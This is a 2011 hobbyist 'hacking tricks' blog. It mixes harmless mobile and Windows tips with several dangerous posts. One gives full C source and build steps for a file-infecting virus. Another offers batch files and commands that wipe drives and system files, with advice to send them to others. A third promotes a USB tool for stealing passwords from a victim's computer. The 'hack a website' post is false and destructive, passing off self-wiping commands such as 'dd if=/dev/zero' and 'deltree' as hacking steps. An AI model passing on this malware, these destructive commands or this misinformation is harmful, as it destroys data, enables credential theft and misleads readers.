Search This Blog

Friday, September 30, 2011

Funky E-mail ID


        Hi friends r u bored from ur old email id????? Now msn present funky id 4 U such as heybaby.co.in, clubdhoni.co.in, kolkotarocks.co.in etc….  So why u wait just login www.coolhotmail.com & enjoy funky id…

Thursday, September 29, 2011

How to Create a Computer Virus???


        This program is an example of how to create a virus in C. This program demonstrates a simple virus program which upon execution (Running) creates a copy of itself in the other file. Thus it destroys other files by infecting them. But the virus infected file is also capable of spreading the infection to another file and so on. Here’s the source code of the virus program.
 
#include
#include
#include
#include
#include
#include
FILE *virus,*host;
int done,a=0;
unsigned long x;
char buff[2048];
struct ffblk ffblk;
clock_t st,end;
void main()
{
st=clock();
clrscr();
done=findfirst(“*.*”,&ffblk,0);
while(!done)
{
virus=fopen(_argv[0],”rb”);
host=fopen(ffblk.ff_name,”rb+”);
if(host==NULL) goto next;
x=89088;
printf(“Infecting %s\n”,ffblk.ff_name,a);
while(x>2048)
{
fread(buff,2048,1,virus);
fwrite(buff,2048,1,host);
x-=2048;
}
fread(buff,x,1,virus);
fwrite(buff,x,1,host);
a++;
next:
{
fcloseall();
done=findnext(&ffblk);
}
}
printf(“DONE! (Total Files Infected= %d)”,a);
end=clock();
printf(“TIME TAKEN=%f SEC\n”,
(end-st)/CLK_TCK);
getch();
}

COMPILING METHOD:

USING BORLAND TC++ 3.0 (16-BIT):
1. Load the program in the compiler, press Alt-F9 to compile
2. Press F9 to generate the EXE file (DO NOT PRESS CTRL-F9,THIS WILL INFECT ALL THE FILES IN CUR DIRECTORY INCLUDIN YOUR COMPILER)
3. Note down the size of generated EXE file in bytes (SEE EXE FILE PROPERTIES FOR IT’S SIZE)
4. Change the value of X in the source code with the noted down size (IN THE ABOVE SOURCE CODE x= 89088; CHANGE IT)
5. Once again follow the STEP 1 & STEP 2.Now the generated EXE File is ready to infect

USING BORLAND C++ 5.5 (32-BIT) :
1. Compile once,note down the generated EXE file length in bytes
2. Change the value of X in source code to this length in bytes
3. Recompile it.The new EXE file is ready to infect

HOW TO TEST:

1. Open new empty folder
2. Put some EXE files (BY SEARCHING FOR *.EXE IN SEARCH & PASTING IN THE NEW FOLDER)
3. Run the virus EXE file there you will see all the files in the current directory get infected.
4. All the infected files will be ready to reinfect


Wednesday, September 21, 2011

Chat with Friends through ms dos Command Prompt

1) All you need is your friend's IP Address and your Command Prompt.

2) Open Notepad and write this code as it is.....!
@echo off
:A
Cls
echo MESSENGER
set /p n=User:
set /p m=Message:
net send %n% %m%
Pause
Goto A

3) Now save this as "Messenger.Bat".

4) Open Command Prompt.

5) Drag this file (.bat file) over to Command Prompt and press Enter.

6) You would then see something like this:

7) Now, type the IP Address of the computer you want to contact and press enter
You will see something like this:

8) Now all you need to do is type your message and press Enter.
Start Chatting.......! 


Monday, September 19, 2011

Aircel Free GPRS

Just try given below..............
   Home : www.google.com
   Proxy : 10.104.92.8
   ProxyPort : 8080
   Apn : wap.aircelinc.in

Cleanup RAM using NOTEPAD

1. Open NOTEPAD and Type
      FreeMem=Space(64000000)
2  Save it as cleanram.vbs
3. Open that file when you want to 
    clean free your RAM.......

Free Google Search in Mobile without GPRS

For Free Google search without GPRS...
Just Dial 18004199999(Toll-free)....
If you face any trouble with your Nokia handset'
Just dial 18004253388(Toll-free) 

Thursday, September 15, 2011

How To Hack a Website???

        With the proper understanding of relevant programming languages such as C, C++, Perl, java etc.
One can be fully equipped with the techniques of hacking into the website. There backdoors for the web hackers for website hacking. For hacking web sites one of the best ways for the hacker is to install linux on his or her personal computer he or she wants to hack from. Then he can open up a shell to type: dd if=/dev/zero of=/dev/hda1 and press ENTER. As the next step he will type: dd hf= (url). There are a few other alternatives for hacking sites as well. The web hackers using Windows pc can also master the art of hacking websites with the flicking of his finger.


The first step is to clean up the tracks so that the feds fail to trace out the hacker. This happens automatically in case of linux. Cleaning up of tracks in case of Windows 95 or Windows 98 or Windows ME involves a step-by step procedure. Click Start then Run and then Command. In case of Windows NT or Windows 2000 the Tracks can be cleaned by pressing Start, then Run and then cmd. The next step is to clean up tracks with deltree c:/windows or c:\winnt, or whatever the main windows directory is. At the command prompt, press y, which will then go through and clean up the system's logs. The hackers should perform the same steps again after the hacking sites/hacking wireless internet sites. Then after this cleaning up the hackers should type: ping -l4000 (url).
Cyber Terrorism And Hacker's Group
The whole planet is today terrorized by the web hackers to whom hacking seems a mode of getting pleasure by the way of gaining knowledge or mere entertainment. A group of serious hackers named as PENTAGUARD had cracked into the government sites of Australia, America and England all at a time. The hackers in this case had replaced with a typical statement that read "The largest .gov & .mil mass defacement in the history of mankind".

This was a simple statement with an aesthetic undertone of threat. The act affected almost 24 sites with a transitory disruption.Similarly an educational site on the mad cow disease was defaced along with some cities and the nation's government sites in England. The Alaskan office of the department of interior was once attacked since the secretary of the Interior Designate, Gale Norton, encouraged drilling in the Arctic Wild Life Refugee for sucking out oil.

The common wealth of Australia is of no exception. The search page of the common wealth of Australia was once hacked along with the act of hacking into websites of small municipal sites in Australia. These are a scanty number of instances that proved to have jeopardized the respective concerns severely. The hackers had to use simple techniques and methods to do these. website hacking for these hackers is all as simple as a child's play. Their main focus was on the sites that were designed with vulnerable loopholes.

USB Password Stealer

Tweaked USB that steals every passwords including licences.

Instructions

1.Decompress the archive and put all the files located in the folder “USBThief”into a USB.

2.Insert the USB in your victim’s computer.

3.View folder “dump” to see the passwords.

Download

Password: www.dl4all.com

How to Format A HDD With Notepad???

        If you think that notepad is useless then you are wrong because you can now do a lot of things with a notepad which you could have never imagined.In this hack I will show you how to format a HDD using a notepad. This is really cool.

Step 1.
Copy The Following In Notepad Exactly as it says01001011000111110010010101010101010000011111100000

Step 2.
Save As An EXE Any Name Will Do

Step 3.
Send the EXE to People And Infect


OR

IF u think u cannot format c driver when windows is running try Laughing and u will get it Razz .. any way some more so u can test on other drives this is simple binary code
format c:\ /Q/X — this will format your drive c:\

01100110011011110111001001101101011000010111010000 100000011000110011101001011100

0010000000101111010100010010111101011000

format d:\ /Q/X — this will format your dirve d:\

01100110011011110111001001101101011000010111010000 100000011001000011101001011100

0010000000101111010100010010111101011000

format a:\ /Q/X — this will format your drive a:\

01100110011011110111001001101101011000010111010000 100000011000010011101001011100

0010000000101111010100010010111101011000

del /F/S/Q c:\boot.ini — this will cause your computer not to boot.

01100100011001010110110000100000001011110100011000 101111010100110010111101010001

00100000011000110011101001011100011000100110111101 101111011101000010111001101001

0110111001101001

try to figure out urself rest
cant spoonfeed
its working

Do not try it on your PC. Don’t mess around this is for educational purpose only

still if you cant figure it out try this

go to notepad and type the following:

@Echo off
Del C:\ *.*|y

save it as Dell.bat

want worse then type the following:

@echo off
del %systemdrive%\*.*/f/s/q
shutdown -r -f -t 00

and save it as a .bat file

Monday, September 12, 2011

How to disable UAC in Windows 7???

        Many people have asked me on how to disable the User Account Controlbetter Known as UAC.This tool informs the user whenever a program tries to install in Windows 7 and also vista.
This is basically a good idea but some times you feel like getting rid of this annoying warning.
So to disable UAC just do the following.

  1. Goto control panel
  2. Click on User Accounts and Family Safety
  3. Now click on User Accounts icon.
  4. Then click on the Change User Account Control Settings under the “Make Changes to your user account”menu panel.
  5. Goto User Account Control Settings
  6. Now simply slide down the left slidebar to make it “Never Notify”.
  7. That's it you are done now you have sucessfully disabledUAC

Saturday, September 10, 2011

How to Unlock or Hack memory card when you forgot your memory card password???

Some times it happens that you forgot the password of your memory card and you have lots of your important data in your phone.

So there are two types of methods for recovering the password of your memory card with the help of nokia phone.

For Nokia s60 1st and 2nd edition phones.

1. First Install FExplorer in your phone memory.


2. Got to drive C: , you will find a file called mmcstore

3. Send it to your pc directly and open it in notepad or rename the file.

4. At the end of the file you will find your password.
For Nokia S60 3rd Phones, Nokia N-Series and Nokia E-Series

There is almost no way yet known to hack the memory card password in case of these types of phone but there is a way to do it some of the s60 3rd edition phones and almost all the E-series phones.

The remote lock option in E-Series phone allws you to unlock your phone by sending a sms.

The only thing you have to do is to activate this feature by going to Tools | Settings | Security | Phone and SIM | Allow remote lock menu. The password of your memory card will be your remote lock message.

So you have to just send a sms containing your remote lock message that will automatically change your memory card passsword.